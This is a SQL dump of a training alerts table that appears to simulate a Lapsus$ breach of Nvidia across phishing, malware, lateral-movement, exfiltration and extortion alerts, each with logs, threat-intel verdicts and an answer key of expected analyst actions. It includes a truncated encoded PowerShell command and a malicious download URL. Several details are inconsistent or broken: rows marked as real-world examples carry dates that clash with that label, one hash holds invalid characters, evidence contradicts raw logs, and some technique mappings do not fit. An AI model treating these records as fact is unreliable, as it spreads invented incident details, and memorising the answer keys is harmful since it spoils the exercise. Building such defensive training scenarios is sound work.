(904, 'Initial Network Breach via Phishing', 'high', 'Email gateway logs', 'Lapsus$ initiated a phishing campaign targeting Nvidia employees. An email containing a malicious link was sent to multiple employees, resulting in credential harvesting.', 'Phishing', 'T1566.001 - Spear Phishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T09:32:45Z\",\"email\":{\"source_ip\":\"185.92.220.75\",\"destination_ip\":\"10.1.1.25\",\"sender\":\"support@nvidiacorp-help.com\",\"recipient\":\"john.doe@nvidia.com\",\"subject\":\"Important Security Update Required\",\"attachment\":\"SecurityUpdate.exe\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"url\":\"http://nvidiacorp-security.com/update\",\"url_status\":\"malicious\"},\"user\":{\"username\":\"john.doe\",\"action\":\"clicked_link\"}}', '2026-01-15 01:00:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known phishing campaign IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"support@nvidiacorp-help.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Spoofed domain\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"john.doe@nvidia.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate employee email\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Malicious executable 
hash\"}},{\"id\":\"artifact_6\",\"type\":\"url\",\"value\":\"http://nvidiacorp-security.com/update\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Blacklist\",\"verdict\":\"malicious\",\"details\":\"Phishing URL\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Network Breach via Phishing\",\"date\":\"2026-02-01T20:32:22.585Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(905, 'Malware Deployment for Credential Harvesting', 'high', 'Endpoint detection systems', 'Using harvested credentials, Lapsus$ deploys malware to escalate privileges and harvest additional credentials.', 'Malware', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:32:45Z\",\"event_id\":\"EVT-20231020-001\",\"source_ip\":\"185.143.223.11\",\"destination_ip\":\"192.168.1.15\",\"username\":\"john_doe\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"credential_harvester.exe\",\"action\":\"File executed\",\"outcome\":\"Successful execution\",\"device\":\"DESKTOP-5G6H7J8\",\"os\":\"Windows 10 Pro\",\"process_id\":4321}', '2026-01-15 01:00:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.143.223.11\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lapsus$ group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal company IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential harvesting malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"credential_harvester.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint\",\"verdict\":\"suspicious\",\"details\":\"Unusual file detected in execution 
logs.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(906, 'Establish Persistence with Backdoor', 'high', 'Network traffic analysis', 'The alert indicates that a backdoor was installed on a critical system within Nvidia\'s network, allowing the attacker to maintain unauthorized access. This is the third step in an ongoing operation to ensure persistent access despite detection attempts.', 'Backdoor', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:30Z\",\"source_ip\":\"192.168.1.102\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"TCP\",\"destination_port\":443,\"filename\":\"nvidia_persistence_service.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"jdoe\",\"action\":\"File Download\",\"malware_name\":\"APT29 Backdoor\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"url\":\"http://malicious.example.com/nvidia_persistence_service.exe\"}', '2026-01-15 01:00:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in suspicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"public\",\"verdict\":\"malicious\",\"details\":\"Associated with known APT activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as APT29 Backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"nvidia_persistence_service.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Unexpected file name associated with APT 
activity.\"}},{\"id\":\"artifact_5\",\"type\":\"url\",\"value\":\"http://malicious.example.com/nvidia_persistence_service.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"PhishTank\",\"verdict\":\"malicious\",\"details\":\"URL hosting malicious payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(907, 'Lateral Movement Through Network', 'high', 'Internal network monitoring', 'An unauthorized lateral movement was detected in the network. The attacker, identified as part of the Lapsus$ group, exploited vulnerabilities to gain access to systems housing Nvidia\'s sensitive data stores. The attack originated from an external IP and moved laterally through several internal IPs, indicating a sophisticated breach.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:32:45Z\",\"event_type\":\"authentication_attempt\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"filename\":\"credentials_dump.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"lateral_movement\",\"status\":\"failed_attempt\",\"network_segment\":\"internal\",\"alerts\":[\"Unauthorized access attempt detected\",\"Potential lateral movement\"]}', '2026-01-15 01:00:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Mapping\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"credentials_dump.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Known malware used for credential dumping\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Lookup Service\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Lapsus$ 
operations\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(908, 'Data Exfiltration of 1TB Proprietary Data', 'critical', 'Data loss prevention systems', 'With access to critical data, Lapsus$ begins exfiltrating 1TB of proprietary information, including GPU drivers and firmware. The data exfiltration was detected by monitoring anomalous outbound traffic from an internal server to a known malicious IP address.', 'Data Exfiltration', 'T1020: Automated Exfiltration', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"DATA_EXFILTRATION\",\"source_ip\":\"10.0.3.15\",\"destination_ip\":\"185.143.221.36\",\"data_volume\":\"1TB\",\"protocol\":\"HTTPS\",\"user\":\"jdoe\",\"process\":\"exfiltrate.exe\",\"hash\":\"a7b8c9d0e123f4567890ab1c2de3f4567g89h0123456789abcde123f4567abcd\",\"filename\":\"Nvidia_GPU_Drivers.zip\",\"alert_id\":\"DXF-20231012-001\"}', '2026-01-15 01:00:55', '2026-02-16 17:55:26', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.3.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.143.221.36\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lapsus$ group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a7b8c9d0e123f4567890ab1c2de3f4567g89h0123456789abcde123f4567abcd\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_db\",\"verdict\":\"malicious\",\"details\":\"Hash associated with data exfiltration tools.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Nvidia_GPU_Drivers.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Unusual file transfer 
detected.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.590Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"DATA_EXFILTRATION\\\",\\\"source_ip\\\":\\\"10.0.3.15\\\",\\\"destination_ip\\\":\\\"185.143.221.36\\\",\\\"data_volume\\\":\\\"1TB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"process\\\":\\\"exfiltrate.exe\\\",\\\"hash\\\":\\\"a7b8c9d0e123f4567890ab1c2de3f4567g89h0123456789abcde123f4567abcd\\\",\\\"filename\\\":\\\"Nvidia_GPU_Drivers.zip\\\",\\\"alert_id\\\":\\\"DXF-20231012-001\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.590Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"DATA_EXFILTRATION\\\",\\\"source_ip\\\":\\\"10.0.3.15\\\",\\\"destination_ip\\\":\\\"185.143.221.36\\\",\\\"data_volume\\\":\\\"1TB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"process\\\":\\\"exfiltrate.exe\\\",\\\"hash\\\":\\\"a7b8c9d0e123f4567890ab1c2de3f4567g89h0123456789abcde123f4567abcd\\\",\\\"filename\\\":\\\"Nvidia_GPU_Drivers.zip\\\",\\\"alert_id\\\":\\\"DXF-20231012-001\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.590Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"DATA_EXFILTRATION\\\",\\\"source_ip\\\":\\\"10.0.3.15\\\",\\\"destination_ip\\\":\\\"185.143.221.36\\\",\\\"data_volume\\\":\\\"1TB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"process\\\":\\\"exfiltrate.exe\\\",\\\"hash\\\":\\\"a7b8c9d0e123f4567890ab1c2de3f4567g89h0123456789abcde123f4567abcd\\\",\\\"filename\\\":\\\"Nvidia_GPU_Drivers.zip\\\",\\\"alert_id\\\":\\\"DXF-20231012-001\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.590Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"DATA_EXFILTRATION\\\",\\\"source_ip\\\":\\\"10.0.3.15\\\",\\\"destination_ip\\\":\\\"185.143.221.36\\\",\\\"data_volume\\\":\\\"1TB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"process\\\":\\\"exfiltrate.exe\\\",\\\"hash\\\":\\\"a7b8c9d0e123f4567890ab1c2de3f4567g89h0123456789abcde123f4567abcd\\\",\\\"filename\\\":\\\"Nvidia_GPU_Drivers.zip\\\",\\\"alert_id\\\":\\\"DXF-20231012-001\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.590Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"DATA_EXFILTRATION\\\",\\\"source_ip\\\":\\\"10.0.3.15\\\",\\\"destination_ip\\\":\\\"185.143.221.36\\\",\\\"data_volume\\\":\\\"1TB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"process\\\":\\\"exfiltrate.exe\\\",\\\"hash\\\":\\\"a7b8c9d0e123f4567890ab1c2de3f4567g89h0123456789abcde123f4567abcd\\\",\\\"filename\\\":\\\"Nvidia_GPU_Drivers.zip\\\",\\\"alert_id\\\":\\\"DXF-20231012-001\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(909, 'Extortion via Demands for Open-Source Drivers', 'high', 'Public forums and social media', 'Lapsus$ has publicly demanded Nvidia to open-source their drivers, leveraging social media to apply pressure. The group has released sensitive internal documents and threatened further leaks if demands are not met.', 'Extortion', 'T1486 - Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.0.0.5\",\"user\":\"lapsus$member\",\"action\":\"post\",\"platform\":\"Twitter\",\"content\":\"Nvidia, open-source your drivers or face more leaks. #OpenSourceDrivers\",\"related_hashes\":[\"e99a18c428cb38d5f260853678922e03\",\"d1f2e6f1c2b8a3c4d5e6f7b8c2d1e3a4\"],\"related_files\":[\"NVIDIA_Internal_Document1.pdf\",\"NVIDIA_Internal_Document2.pdf\"],\"related_email\":\"contact@lapsus$.com\"}', '2026-01-15 01:00:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lapsus$ operations.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash related to potentially malicious document.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"contact@lapsus$.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Source Intelligence\",\"verdict\":\"malicious\",\"details\":\"Email used for extortion communications.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"escalate\"]}', 'expert', 'DLP', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.591Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.5\\\",\\\"user\\\":\\\"lapsus$member\\\",\\\"action\\\":\\\"post\\\",\\\"platform\\\":\\\"Twitter\\\",\\\"content\\\":\\\"Nvidia, open-source your drivers or face more leaks. #OpenSourceDrivers\\\",\\\"related_hashes\\\":[\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"d1f2e6f1c2b8a3c4d5e6f7b8c2d1e3a4\\\"],\\\"related_files\\\":[\\\"NVIDIA_Internal_Document1.pdf\\\",\\\"NVIDIA_Internal_Document2.pdf\\\"],\\\"related_email\\\":\\\"contact@lapsus$.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.591Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.5\\\",\\\"user\\\":\\\"lapsus$member\\\",\\\"action\\\":\\\"post\\\",\\\"platform\\\":\\\"Twitter\\\",\\\"content\\\":\\\"Nvidia, open-source your drivers or face more leaks. 
#OpenSourceDrivers\\\",\\\"related_hashes\\\":[\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"d1f2e6f1c2b8a3c4d5e6f7b8c2d1e3a4\\\"],\\\"related_files\\\":[\\\"NVIDIA_Internal_Document1.pdf\\\",\\\"NVIDIA_Internal_Document2.pdf\\\"],\\\"related_email\\\":\\\"contact@lapsus$.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.591Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.5\\\",\\\"user\\\":\\\"lapsus$member\\\",\\\"action\\\":\\\"post\\\",\\\"platform\\\":\\\"Twitter\\\",\\\"content\\\":\\\"Nvidia, open-source your drivers or face more leaks. #OpenSourceDrivers\\\",\\\"related_hashes\\\":[\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"d1f2e6f1c2b8a3c4d5e6f7b8c2d1e3a4\\\"],\\\"related_files\\\":[\\\"NVIDIA_Internal_Document1.pdf\\\",\\\"NVIDIA_Internal_Document2.pdf\\\"],\\\"related_email\\\":\\\"contact@lapsus$.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.591Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.5\\\",\\\"user\\\":\\\"lapsus$member\\\",\\\"action\\\":\\\"post\\\",\\\"platform\\\":\\\"Twitter\\\",\\\"content\\\":\\\"Nvidia, open-source your drivers or face more leaks. 
#OpenSourceDrivers\\\",\\\"related_hashes\\\":[\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"d1f2e6f1c2b8a3c4d5e6f7b8c2d1e3a4\\\"],\\\"related_files\\\":[\\\"NVIDIA_Internal_Document1.pdf\\\",\\\"NVIDIA_Internal_Document2.pdf\\\"],\\\"related_email\\\":\\\"contact@lapsus$.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.591Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.5\\\",\\\"user\\\":\\\"lapsus$member\\\",\\\"action\\\":\\\"post\\\",\\\"platform\\\":\\\"Twitter\\\",\\\"content\\\":\\\"Nvidia, open-source your drivers or face more leaks. #OpenSourceDrivers\\\",\\\"related_hashes\\\":[\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"d1f2e6f1c2b8a3c4d5e6f7b8c2d1e3a4\\\"],\\\"related_files\\\":[\\\"NVIDIA_Internal_Document1.pdf\\\",\\\"NVIDIA_Internal_Document2.pdf\\\"],\\\"related_email\\\":\\\"contact@lapsus$.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(910, 'Public Disclosure and Spectacle Tactics', 'high', 'Press releases and news articles', 'The attacker group has released sensitive data to media outlets, leveraging public spectacle to amplify their demands against Nvidia. This includes press releases and strategically placed news articles aimed at maximizing public attention.', 'Public Disclosure', 'T1585.001 - Establish Accounts: Social Media Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"event_type\":\"public_disclosure\",\"source_ip\":\"198.51.100.14\",\"affected_organization\":\"Nvidia\",\"media_outlet\":\"HackerNews\",\"disclosed_data\":[{\"file_name\":\"nvidia_leaked_plans.pdf\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\"},{\"file_name\":\"confidential_emails.txt\",\"file_hash\":\"7d793037a0760186574b0282f2f435e7\"}],\"user_account\":\"attacker@darkmail.com\",\"disclosure_platform\":\"https://hackernews.com/leaks/nvidia\"}', '2026-01-15 01:00:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.14\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous cyber-attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"nvidia_leaked_plans.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"File associated with data breaches.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_emails.txt\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"File associated with unauthorized disclosures.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"attacker@darkmail.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Email used in multiple attack 
campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"url\",\"value\":\"https://hackernews.com/leaks/nvidia\",\"is_critical\":false,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"suspicious\",\"details\":\"URL used for public disclosure of sensitive information.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'expert', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.593Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 